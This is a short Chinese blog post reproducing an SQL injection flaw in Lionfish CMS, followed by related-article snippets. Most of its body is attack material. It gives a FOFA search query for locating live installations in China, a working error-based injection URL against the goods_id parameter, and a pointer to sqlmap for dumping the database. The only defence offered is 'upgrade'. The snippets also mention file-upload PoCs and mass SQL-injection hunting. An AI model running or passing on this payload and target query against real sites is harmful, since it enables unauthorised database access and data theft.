狮子鱼cms-sql注入漏洞复现

最新推荐文章于 2024-02-11 08:26:18 发布
最新推荐文章于 2024-02-11 08:26:18 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68647219/article/details/132720809
版权

 1.简介    

       工作发现,狮子鱼cms存在sql注入漏洞,该漏洞是由于狮子鱼CMS ApiController.class.php 参数过滤存在不严谨可能导致SQL注入漏洞

2.FOFA语法

"/seller.php?s=/Public/login" && country="CN"

 3.poc

index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)

使用sqlmap爆破数据库

 

4.修复建议

升级至最新版本 

朝阳挽歌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
行云海CMS SQL注入漏洞复现
0xSec
12-05 1191
行云海cms中ThinkPHP在处理order by排序时可利用key构造SQL语句进行注入,LtController.class.php中发现传入了orderby未进行过滤导致sql注入。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
入侵狮子图像数据集-物体检测
01-10
入侵狮子-物体检测 通过检测入侵的狮子,帮助拯救本地加勒比物种! 该数据集由565张图像组成,标记为YOLOv5格式的边界框,并分成训练/评估/测试桶进行对象检测。
漏洞复现狮子任意文件上传漏洞
失心少年
12-05 977
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!它具有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。此外,狮子CMS还具有强大的模板和主题系统,用户可以根据自己的需求和喜好选择合适的模板和主题来定制网站的外观和风格。该上传点位返回上传文件名及路径,大家可自行本地搭建,尝试获取上传的文件路径。
漏洞复现狮子CMSSQL注入漏洞
晚风不及你
02-09 1221
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
【1day】狮子CMS注入漏洞学习(2个)
记录并分享学习安全的知识点..
07-07 1096
狮子CMS注入漏洞学习
狮子SQL注入漏洞复现
花开烟雨楼的博客
03-23 1325
狮子CMS是一款管理系统。在 ApiController.class.php处 参数过滤存在不严谨,导致SQL注入漏洞
批量挖sql注入漏洞
Azjj
10-08 3937
这是去年我写的一篇文章,眼看着服务器马上到期了,也没有备份,直接复制过来了,也懒得改格式了,适合新手刷洞,将就看吧文章很水,但是很实在。 关于批量挖sql注入,其实很简单,之前我在补天提交漏洞的时候,曾经在往常查阅了以下关于批量挖SQL注入的文章,其实没几个,无非就是告诉你用谷歌关键词之类的,但是搜索出来的站点挨个测试,太费时间和精力,效率太低 这里我就讲一下怎么用最省力的方式批量刷sql注入的站点 第一这里需要几个工具 ①7KBscan 爬虫机器人 (爬虫工具,种类很多,也可以自己写) ②批量检测.
狮子cms-SQL注入
weixin_46663238的博客
10-20 2096
狮子CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
靶场上新:狮子CMS前台SQL注入
2301_80115097的博客
10-30 187
狮子CMS ApiController.class.php 因参数过滤存在不严谨,导致SQL注入漏洞。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。狮子CMS是以小程序为载体,快速搭建社区社群社交资源的社区团购平台,用于帮助商家集中运营管理。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,(私聊进群一起学习,共同进步)帮助你在面试中脱颖而出。
4K-HRD博茨瓦纳的狮子家族
最新发布
03-21
4K-[HRD]博茨瓦纳的狮子家族
56--[打狮子].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-17
56--[打狮子].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码56--[打狮子].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码56--[打狮子].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码56...
论文研究 - 狮子脚的影响(
05-30
本工作旨在研究不同浓度的狮子脚(寻常白菜)叶的抗氧化剂活性的影响,从而为慢性肝病提供更多保护。 结果表明,干燥的狮子脚叶子富含总的多酚和类黄酮含量(分别为395.65和183.10 mg / 100g)。 这些结果反映在抗...
狮子座-个人记账软件
01-10
深邃的狮子座 - 个人记账软件 一、功能: 1.支持多用户 2.隐私保护(采用MD5单向加密技术以保护您的密码安全) 3.账目包括:编号,日期,类型(收入,支出),名称(剪短说明),金额,账户结余,备注 4.csv...
狮子狮子漫游的地方:VELDT上的RISC-V
03-04
狮子漫游的地方:VELDT上的RISC-V Lion是经过正式验证的5级流水线内核。 Lion以为目标,并使用在Haskell中编写。 该存储库包含三个部分: Lion库:流水线RISC-V内核。 :使用正式验证核心。 :片上系统,展示了VELDT...
漏洞复现狮子CMS文件上传漏洞(image_upload.php)
晚风不及你
02-11 1520
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
2023最新SRC漏洞挖掘快速上手攻略!
zkaqlaoniao的博客
11-08 943
制胜点就在这里了,比如你交了一个中危的漏洞是3分,但是你报告写的好,是优秀,积分翻倍变6分,相当于交了两个中危漏洞。我看很多人,漏洞正文只有文字 没有图片,很简陋,我们最好加上图片,审核员看的舒服一点,心情好点,对我们有好处。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。当初刚挖SRC,不会交报告,一股脑交了一大堆,全被打回来了,漏洞白挖 报告白写。我在上面的“提交报告”中,教大家提交的报告,漏洞标题、基本信息、漏洞正文,这3个都算好,不用管。
网络爬虫+SQL注入检测三
weixin_30244889的博客
04-02 376
4.3 爬虫和SQL检查的结合在lib/core/Spider.py文件引用一下from script import sqlcheck 等下节课我们开发出了插件系统后,就不需要这样引用了,爬虫会自动调用,但这节课为了测试,我们还是引用一下。在craw()方法中,取出新url地方调用一下。()##sql checktry: if(sqlcheck.sqlcheck(new_url)): ...
狮子社区团购系统CMS任意文件2处上传漏洞
赵一舟的博客
06-09 3439
漏洞复现 FOFA语句 "/seller.php?s=/Public/login" POC1 POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 213 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: mul.
linux系统(CVE-2016-2183)漏洞修复方法
09-09
为修复Linux系统中的CVE-2016-2183漏洞,可以按照以下步骤进行操作: 1. 首先,需要升级OpenSSL。可以使用编译安装的方式来安装最新版本的OpenSSL。可以参考引用中的博客文章,根据其中提供的详细步骤进行安装和配置。 2. 下载最新版本的OpenSSL源代码,并解压到指定目录。可以使用以下命令进行解压: ``` tar xvf openssl-1.1.1g.tar.gz -C /usr/local/ ``` 3. 进入解压后的目录: ``` cd /usr/local/openssl-1.1.1g/ ``` 4. 执行配置、编译和安装命令: ``` ./config && make && make install ``` 5. 在ld.so.conf配置文件中添加库路径: ``` echo "/usr/local/lib64/" >> /etc/ld.so.conf ``` 6. 更新动态链接库缓存: ``` ldconfig ``` 7. 重命名原有的openssl二进制文件: ``` mv /usr/bin/openssl /usr/bin/openssl.old ``` 8. 创建符号链接以便使用新版本的openssl: ``` ln -sv /usr/local/bin/openssl /usr/bin/openssl ``` 通过执行以上步骤,你可以成功修复Linux系统中的CVE-2016-2183漏洞,并升级到最新版本的OpenSSL。请确保在操作之前备份相关文件,并按照具体情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朝阳挽歌

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值